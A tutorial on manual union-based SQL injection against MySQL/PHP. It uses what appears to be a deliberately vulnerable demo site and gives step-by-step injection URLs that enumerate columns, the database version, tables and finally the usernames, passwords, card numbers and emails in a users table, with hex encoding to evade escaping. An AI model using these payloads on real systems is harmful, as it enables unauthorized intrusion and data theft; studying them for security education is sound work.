Basic SQL Injection Tutorial - MYSQL & PHP

This tutorial will help explain the steps in performing a manual SQL injection against a MYSQL database. By doing it manually you are learning the necessary skills and knowledge required to advance in the field of ethical hacking. The goal is to continuously learn and advance your skills. Never stop learning!

Here are the 5 steps in performing a Basic SQL injection.

1. Find a website that is vulnerable.
2. Finding a vulnerable column.
3. Identify the version of MYSQL.
4. Identify more Tables in the database, like the USER table.
5. Extract the data you want from the database, like usernames, password etc..

We have to find a website which is vulnerable to SQL injection (SQLi) attacks. a SQLi vulnerability has 2 criteria.
Firstly, it has to allow execution of queries from the url, and secondly, it should show an error for some kind of query or the other. An error is an indication of a SQL vulnerability.

After we know that a site is vulnerable, we need to execute a few queries to makes it act in an unexpected manner. Then we should obtain information about SQL version, find some useful tables finally extract the data we want from those tables.

Important note on performing SQL injection is that in all cases you need to always balance the SQL query.

You do this by:

• adding SQL comment code to your query to comment out the rest of the query so it doesn't run.
• Fitting your query into an existing SQL statement.

The same way we need to ensure the HTML syntax stays intact when we inject code to perform XSS attacks.

Step 1 - How to identify a potential SQL database that is vulnerable to injection

There are two important factors you need from the database to be vulnerable.

• A SQL database is vulnerable if it allows the execution of SQL queries from the URL. Ask yourself this - Does the website allow the underlying PHP code to request data from the database.
• Does the SQL database fail to sanitise or escape dangerous characters.

Once you have found a site that allows the underlying website to interact with the database you can test for bad sanitation by adding a single ' to the query.

http://testphp.vulnweb.com/listproducts.php?cat=1'

The ' is used to identify how the server handles bad inputs. If it does not have mechanisms for sanitizing or escaping dangerous characters, you will receive somekind of SQL error.

Look for any words that may relate to a database. Tables, columns, select, order, SQL, MYSQL etc....
The idea in this step is to confirm that the database is vulnerable.

We now know that:

• http://testphp.vulnweb.com is vulnerable
• The table that lists products could be vulnerable.

Step 2 - Finding a vulnerable column

Now you need to identify the number of columns in the table.

A easy way to achieve this is by utilising ORDER BY - ORDER BY is used to sort your results by one or more columns.

For example let's you have a table called CARS. Inside that table you have columns to describe the CAR.
* Make(Column1) * Model(Column2) * Engine Type (Column3) * Amount of Turbos(Column4) * Colour(Column5) * Fuel consumption(Column6).

Now let's say you want to list all the cars in the table, but sort them based on the amount of Turbo's they have.
The below SQL statement will select all cars and ORDER by Column4

SELECT * FROM Cars  
ORDER BY 4;  

How this helps us you ask?

Well if I used the following SQL statement to try and ORDER by column7, I would get a SQL error stating that column7 does not exist.

SELECT * FROM Cars  
ORDER BY 7;  

By utilising ORDER BY we can essentially identify the amount of columns within that table. You just keep increasing the column number until you get a SQL error.

http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+12

This means that the table only has 11 columns.

Now we need to find out which of those 11 columns allows us to inject input.We can achieve this by utilising the UNION operator.

UNION - used to combine the results of one or more SELECT commands.

We use the UNION operator to combine our first SELECT with our second SELECT.

The below command lists all products with category 1 aka posters. By addingunion+select+'vuln1','vuln2','vuln3','vuln4','vuln5','vuln6','vuln7','vuln8','vuln9','vuln10','vuln11'we are adding an additional dummy poster with our own values against each column. We concatenate one more row to the output

http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+'vuln1','vuln2','vuln3','vuln4','vuln5','vuln6','vuln7','vuln8','vuln9','vuln10','vuln11'  

• You then need to identify which of those 11 columns are vulnerable.
• Looking at the results notice how vuln7, vuln2 and vuln9 is visible on the page. These particular columns are being used to display information on the webpage and can thus be used to extract information from the database.
• That means that columns 2,7,9 allow SQL injection.

• Column 11 actually also allows SQLi injection. If you run the same command, but change the query to listproducts.php?cat=-1 to only show our newly created ROW.

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+'vuln1','vuln2','vuln3','vuln4','vuln5','vuln6','vuln7','vuln8','vuln9','vuln10','vuln11'  

Important note on mysql_real_escape_string

• Is a PHP functions that Escapes special characters in a string for use in an SQL statement
• For the sake of the example, let's pretend this was enabled.

Using this query would fail - http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+'vuln1','vuln2','vuln3','vuln4','vuln5','vuln6','vuln7','vuln8','vuln9','vuln10','vuln11'

Luckily you can also use the hex values of each string (always prefix your HEX with 0x in SQL statement). If we had to replace each of our vuln strings with it's HEX equivelant we would still get the same output.

Below I am only replacing vuln2 with it's HEX equivalent 0x76756c6e32 . You could of course do this for all the values.

And the result are exactly the same:

We now know that:

• http://testphp.vulnweb.com is vulnerable
• The table that list products could be vulnerable.
• The table has 11 columns.
• Columns 2,7,9,11 allow SQL injection

Important question - Why does the database even allow us to inject data into the SQL query?

• Think about how PHP and a database works together.
• When you first create a database you create a user and give that user the permissions to read/write to the database.
• You then build a website with PHP with specific functions that query the database in a controlled manner.
• Those functions to query the database are made available to a user in a controlled manner by the use of a website frontend in the form of buttons, search boxes, input forms etc....
• All those functions are passed back to PHP which in turn requests data from the SQL server.
• By doing the above SQLi we are bypassing the functions made available to us and passing data directly to the SQL server.
• By doing this we can inject false data into a query and request data we were not suppose to see.
• Remember that computers are not AI and will only check what you tell them to check!

Step 3 - Identifying the MYSQL version

Why do we need this? - Databases and different versions of databases have their own ways to extract data.... Besides the more you know the better!

Below is a list of the other things you can try and run against a database to obtain useful information.

Before we go on lets run the user() variable.

• user()
• system_user()

Running this shows us the current database user. Think how dangerous having this information could be. I have a username and username format.

* @@version

Using column2

http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+'vuln1',@@version,'vuln3','vuln4','vuln5','vuln6','vuln7','vuln8','vuln9','vuln10','vuln11'  

Using column11

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+'vuln1','vuln2','vuln3','vuln4','vuln5','vuln6','vuln7','vuln8','vuln9','vuln10',@@version  

Great so we know that the version of MYSQL is 5.1.73-0 and the underlying system is Ubuntu 10.04.1.

Important note on MYSQL functions

I'm not entirely sure about what type of security protects this, but I will update once I know.
If your function to retrieve the version of the database fails you have two options (maybe more).

• convert(@@version using latin1)
• unhex(hex(@@version))

We now know that:

• http://testphp.vulnweb.com is vulnerable
• The table that list products could be vulnerable.
• The table has 11 columns.
• Columns 2,7,9 allow SQL injection
• MYSQL version is 5.1.73-0
• Running on Ubuntu 10.04.1

Step 4 - Identify more Tables in the database

INFORMATION_SCHEMA is actually a database that exists on the MYSQL instance. It stores information about all the other MYSQL databases on that server.

You can use it to query information about the tables within a database, information like the table_name, table_type.

What we are interested in is what other tables exist within the database. Using your prior knowledge lets run a query against the database to list all other table_names using column2 as our entry point.

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,table_name,3,4,5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()--+  

To make it easier to READ we could use GROUP_CONCAT(). The function is used to concatenate column values into a single string. This way all table names will output into a single string

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()--+  

Great so I would say the valuable database here is users. In the next step we will identify the columns and extract some data.

Step 5 - Identify columns in the user table and extract data

In a similar way we can now list all the columns inside the USERS table.

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10,11+from+information_schema.columns+where+table_schema=database() and table_name='users'--+  

Important note - if you get a error at any point try converting your strings to HEX. Luckily for us the 'users' works without the need for conversion to HEX.

Lots of juicy bits here:

• uname - most likely the usernames
• pass - passwords
• cc - maybe create card details
• email - email addresses

Now that we have our columns we want to extract data from. We can construct our final query to extract the data.

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+all+select+1,group_concat('user:',uname,'----pass:',pass,'-----cc:',cc,'------email:',email),3,4,5,6,7,8,9,10,11+from+users--+  

We are adding some separating 'text' like 'user:', '----pass:' etc... in between the columns to better separate the output.

Finished

If You Enjoyed This, Take 5 Seconds To Share It

• Facebook
• Twitter
• Google+
• StumbleUpon
• Digg
• Delicious
• LinkedIn
• Reddit
• Technorati